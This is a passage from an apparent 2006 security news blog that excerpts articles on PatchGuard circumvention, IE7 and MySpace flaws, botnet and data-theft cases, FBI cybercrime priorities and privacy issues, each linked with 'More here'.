Responding to Authentium's move to circumvent PatchGuard in its products, company officials said that the decision to hack the feature could prove unwise for the security vendor as Microsoft will work to close off any flaws that allow unauthorized kernel interaction, making technologies dependent on such access obsolete.

As a result, users of applications that circumvent PatchGuard could find themselves unprotected from attack, or dealing with other problems driven by a lack of authorized integration between Vista and those products.

More here.

User Friendly: Bubble 2.0

Via UserFriendly.org.


Click for larger image.


Defense Tech: Northrop Advances Combat Laser Development

Via UPI.

Northrop Grumman Wednesday unveiled what it says is a major step toward development of a combat laser weapon for ground troops.

The experimental device known as Vesta was touted as expected to "greatly shorten the timeline for lasers to go from the laboratory to the battlefield," the company said in news release issued by its Space Technology division in Southern California.

More here.

Another Breach at Los Alamos

An AP newswire article, via The Los Angeles Times, reports that:

A drug raid at a trailer park in New Mexico turned up what appeared to be classified documents taken from the Los Alamos nuclear weapons lab, the FBI said Tuesday.

Police found the documents while arresting a man suspected of domestic violence and dealing methamphetamine from his mobile home, said Sgt. Chuck Ney of the Los Alamos, N.M., Municipal Police Department. The documents were discovered during a search of the man's records for evidence of his drug business, Ney said.

Police alerted the FBI to the classified documents, which agents traced back to a woman linked to the drug dealer, officials said. The woman is a contract employee at Los Alamos National Laboratory, according to an FBI official who spoke on condition of anonymity because of the sensitive nature of the case.

The official would not describe the documents except to say that they appeared to contain classified material and were stored on a computer file.

More here.

Help Wanted: Cybercrime High On FBI Priority List

A TechWeb News article by K.C. Jones, via InformationWeek, reports that:

The FBI places cyber attacks among its top three priorities, said Mark Mershon, assistant director in charge of the New York City field office.

In fact, prevention is so important the crime-fighting agency will negotiate its normally strict employment standards for those with cyber backgrounds, he said.

Mershon gave a keynote address at the International Security Conference and Exposition (ISC) East and InfoSecurity 2006, which were held jointly Tuesday at the Jacob Javits Convention Center in New York City.

Behind terrorism and corporate espionage, cyber crime is high on the list of problems the FBI focuses on. Mershon said that although he considers cyber crime a relatively new means of carrying out traditional crimes, he said it requires different skill sets to investigate.

More here.

Secunia Reports Another IE7 Flaw

Ericka Chickowski writes on SC Magazine Online:

Secunia today reported a new vulnerability in Internet Explorer 7 (IE7) that can be exploited to conduct phishing attacks.

The vulnerability reporting firm said that an anonymous tip lead them to the vulnerability, which allows the browser to display a popup with a spoofed address bar that has special characters appended to the URL. The vulnerability makes it possible to only display a part of the address bar, which could potentially fool users into believing in the pop-up's credibility.

The hole is listed as a "Less Critical" vulnerability by Secunia, which has a demonstration of the vulnerability on its site. According to Thomas Kristensen of Secunia, it might be possible for the vigilant user to spot something that isn't quite right when a pop-up occurs but he is worried about the danger to average users.

More here.

BT Snaps Up Counterpane Internet Security

Will Sturgeon writes on C|Net News:

Britain's BT Group has snapped up United States-based Counterpane Internet Security for a sum of more than $20 million as part of a continuing commitment to the security offering and overall growth of its Global Services business.

Counterpane provides managed network security services.

As part of the deal, Counterpane's founder, CTO and highly regarded security guru, Bruce Schneier, will join the BT payroll. Schneier will maintain his position as CTO within Counterpane, based in Mountain View, Calif.

More here.

Tuesday, October 24, 2006

Former AOL Execs Allegedly Lied to Auditors

An AP newswire article, via The New York Times, reports that:

Two former America Online executives and top officials at a defunct Las Vegas software maker lied to auditors as part of a scheme to boost both companies' revenue as the dot-com boom fizzled in 2001, government lawyers argued Tuesday.

Kent Wakeford, former executive director at AOL's business affairs unit, and John Tuli, a former vice president in AOL's NetBusiness unit, are among the four defendants on trial at U.S. District Court in Alexandria.

The men, along with two former executives at PurchasePro, are charged with securities fraud, making false statements to auditors and wire fraud. The defendants deny wrongdoing.

Well, of course they do...

More here.

Zero Day Flaw Found in MySpace

Via Dark Reading.

A researcher has published proof-of-concept code on a zero-day vulnerability he found on MySpace.com -- and another variation on the cross-site scripting (XSS) theme.

Called XSS fragmentation, the vulnerability consists of multiple chunks, or fragments, of JavaScript malware that can slip by a filter or firewall because individually they don't constitute a security risk. But when they are combined after hitting the site, they can then be dangerous.

More here.

FBI: Companies Need to Report Cyber Attacks

Scott Ferguson (no relation) writes on eWeek:

Companies should do more to report cyber-crimes such as hacking and phishing to help federal authorities investigate and ensure that additional data isn't compromised beyond initial attacks, a high-ranking FBI official said.

"A huge issue for us is the underreporting of successful or almost successful hacking," Special Agent Mark Mershin, the assistant director-in-charge of the FBI's New York City Office, told a crowd gathered here at the Infosecurity Conference and Exhibition on Oct. 24.

A 30-year FBI veteran, Mershin was appointed to his current position at the bureau's largest field office in May 2005. The expert spoke for a little more than an hour in a keynote address about the three most important issues facing the agency each day: counterterrorism, counterintelligence and cyber-crimes.

More here.

Firefox 2.0 Rocks


Yes, it does.

Highly recommended upgrade.

- ferg

Bizarre Story of the Day: 'Wrong IP Address' Leads to Shaq Attack on Innocent Family - Updated

Eric Bangeman writes on ARS Technica:

Anyone who follows the slate of lawsuits against music fans is cognizant of the crucial role that IP addresses play in attempts to cow suspected file sharers. But as we have seen time and time again, IP addresses are not consistently reliable means of identifying users. Law enforcement officials and a family in Gretna, Virginia and learned that lesson the hard way after their home was searched by a law enforcement team that included Miami Heat center Shaquille O'Neal, according to a law enforcement official.

The spectre of an angry, uniform-wearing Shaq, let alone an entire team of deputies and federal marshalls would be enough to turn one's knees to jelly. That's the sight apparently witnessed by farmer A.J. Nuckols, his schoolteacher wife, and three children last month when their home was raided and their computers, DVD, video tapes, and other belongings were confiscated after they were connected to an IP address reportedly used to access child pornography on the Internet.

It turned out to be a case of mistaken identity. Nine days after the raid, an investigator told Nuckols that "the wrong IP address had been identified" and that he and his family would not be charged in the investigation. It's great that the Nuckols family is off the hook, but they now have to live with the stigma of having been the targets of a raid by law enforcement.

More here.

(Originally reported over on techdirt.com.)

AP Headline News updates this story: "Authorities: 'Deputy Shaq' Participated"

Security Vendor Bypasses Microsoft's Vista PatchGuard

Matt Hines writes on eWeek:

Security software maker Authentium says that it has created a new version of its flagship product that circumvents the PatchGuard kernel protection technology being added to Microsoft's next-generation Vista operating system.

The company, based in Palm Beach Gardens, Fla., maintains that it has built a version of its Authentium ESP Enterprise Platform that can bypass PatchGuard without setting off the desktop alarms produced by the security feature when the Vista kernel is compromised.

More here.

Florida 'Botmaster' Charged with Akamai DDoS Attack

Drew Cullen writes on The Register:

A Florida man was in federal court today, accused of launching a DDOS attack on Akamai which brought much of the internet to its knees - for a few hours.

John Bombard, 32, of Seminole is charged with hacking into two computer systems as part of a scheme to build a botnet of "zombie" PCs to attack Akamai. According to the FBI, Bombard compromised these systems using a variant of the GAOBOT worm. The bot network assembled for the Akamai attack included PCs at "two major universities", which are not named. The FBI alleges that Bombard "directed communication from the university computer systems to the bot network from a computer located on his domain, f0r.org".

More here.

Operator of 12 Hospitals Informs of Lost Data

An AP newswire article, via MSNBC, reports that:

The operator of 12 hospitals in Indiana and Illinois is notifying more than a quarter-million patients that compact discs containing their Social Security numbers and other personal information were lost for three days over the summer.

However, officials said they do not believe any of the 260,000 patients’ information was improperly accessed.

The Sisters of St. Francis Health Services, which operates 10 hospitals in Indiana and two in Illinois, said in the warning letter that an employee of a medical billing contractor copied the data onto several CDs in July and placed them in a new computer bag to work from home.

More here.

Microsoft: Bot, Trojan Infections High; Rootkits Low

Ryan Naraine writes on eWeek:

New statistics from Microsoft's anti-malware engineering team have confirmed fears that backdoor Trojans and bots present a "significant" threat to Windows users.

However, according to data culled from the software maker's security tools, stealth rootkit infections are on the decrease, perhaps due to the addition of anti-rootkit capabilities in security applications.

The latest malware infection data, released at the RSA Europe conference in Nice, France, covers the first half of 2006. During that period, Microsoft found more than 43,000 new variants of bots and backdoor Trojans that control millions of hijacked Windows machines in for-profit botnets.

Of the 4 million computers cleaned by the company's MSRT (malicious software removal tool), about 50 percent (2 million) contained at least one backdoor Trojan. While this is a high percentage, Microsoft notes that this is a decrease from the second half of 2005. During that period, the MSRT data showed that 68 percent of machines cleaned by the tool contained a backdoor Trojan.

More here.

Haxdoor: UK Police Count 8,500 Victims in Data Theft (So Far)

Jeremy Kirk writes on InfoWorld:

British electronic-crime detectives are investigating a massive data theft operation that stole sensitive information from 8,500 people in the U.K. and others in some 60 countries, officials said Tuesday.

In total, cybercriminals targeted 600 financial companies and banks, according to U.K. authorities, who have worked over the past week to identify and notify victims.

Through intelligence sources, U.K. police were given several gigabytes of data -- around 130,00 files -- that came from a server in the U.S., said Charlie McMurdie, detective chief inspector for the Specialist Crime Directorate e-Crime Unit of the London Metropolitan Police. Most of the data related to financial information, she said.

The data was collected by a malicious software program nicknamed Haxdoor that infected victims' computers. Some 2,300 machines were located in the U.K. McMurdie said.

More here.

Laptops Give Up Secrets to U.S. Customs Agents

A New York Times article by Joe Sharkey, via The International Herald Tribune, reports that:

A lot of business travelers are walking around with laptops that contain private corporate information that their employers really do not want outsiders to see.

Until recently, their biggest concern was that someone might steal the laptop. But now there's a new worry - that the laptop will be seized or its contents scrutinized at U.S. customs and immigration checkpoints upon entering the United States from abroad.

Although much of the evidence for the confiscations remains anecdotal, it's a hot topic this week among more than a thousand corporate travel managers and travel industry officials meeting in Barcelona at a conference of the Association of Corporate Travel Executives.

More here.

Former CIA Chief Joins Qinetiq

Hans Kundnani writes on The Guardian.co.uk:

Qinetiq, the controversially privatised British defence and security technology company, has appointed George Tenet - the CIA chief at the time of 9/11 - as a non-executive director.

Mr. Tenet was widely criticised for intelligence failures in the period before the September 11 terrorist attacks and in the run-up to the Iraq war.

According to Washington Post journalist Bob Woodward's book Plan of Attack, Mr Tenet told President Bush it was a "slam dunk" that Saddam Hussein possessed weapons of mass destruction.

More here.

FCC Action on AT&T Deal Hits Roadblock

Jim Puzzanghera writes in The Los Angeles Times:

Robert McDowell's confirmation in May as the fifth member of the Federal Communications Commission was supposed to end a 2-2 partisan deadlock that had stymied the agency on several issues for more than a year.

But with commission approval all that's standing in the way of AT&T Inc.'s purchase of BellSouth Corp., it's back to stalemate again at the FCC because of the occasional bane of regulatory agencies — a recusal.

McDowell, a Republican who holds the tiebreaking vote, has removed himself from voting on the $83-billion purchase because he used to lobby for an association of smaller phone companies that opposes the deal.

His decision has given the commission's two Democrats leverage to hold up approval unless some of their conditions are met, such as preventing the companies from charging for priority delivery of services over their Internet lines — a controversial issue known as network neutrality.

More here.

Schneier: Airline Passenger Profiling for Profit

Bruce Schneier writes:

I have previously written and spoken about the privacy threats that come from the confluence of government and corporate interests. It's not the deliberate police-state privacy invasions from governments that worry me, but the normal-business privacy invasions by corporations -- and how corporate privacy invasions pave the way for government privacy invasions and visa versa.

The U.S. government's airline passenger profiling system was called Secure Flight, and I've written about it extensively. At one point, the system was going to perform automatic background checks on all passengers based on both government and commercial databases -- credit card databases, phone records, whatever -- and assign everyone a "risk score" based on the data. Those with a higher risk score would be searched more thoroughly than those with a lower risk score. It's a complete waste of time, and a huge invasion of privacy, and the last time I paid attention it had been scrapped.

But the very same system that is useless at picking terrorists out of passenger lists is probably very good at identifying consumers.

More here.

This also seems like a goo dtime to mention UnSecureFlight.com...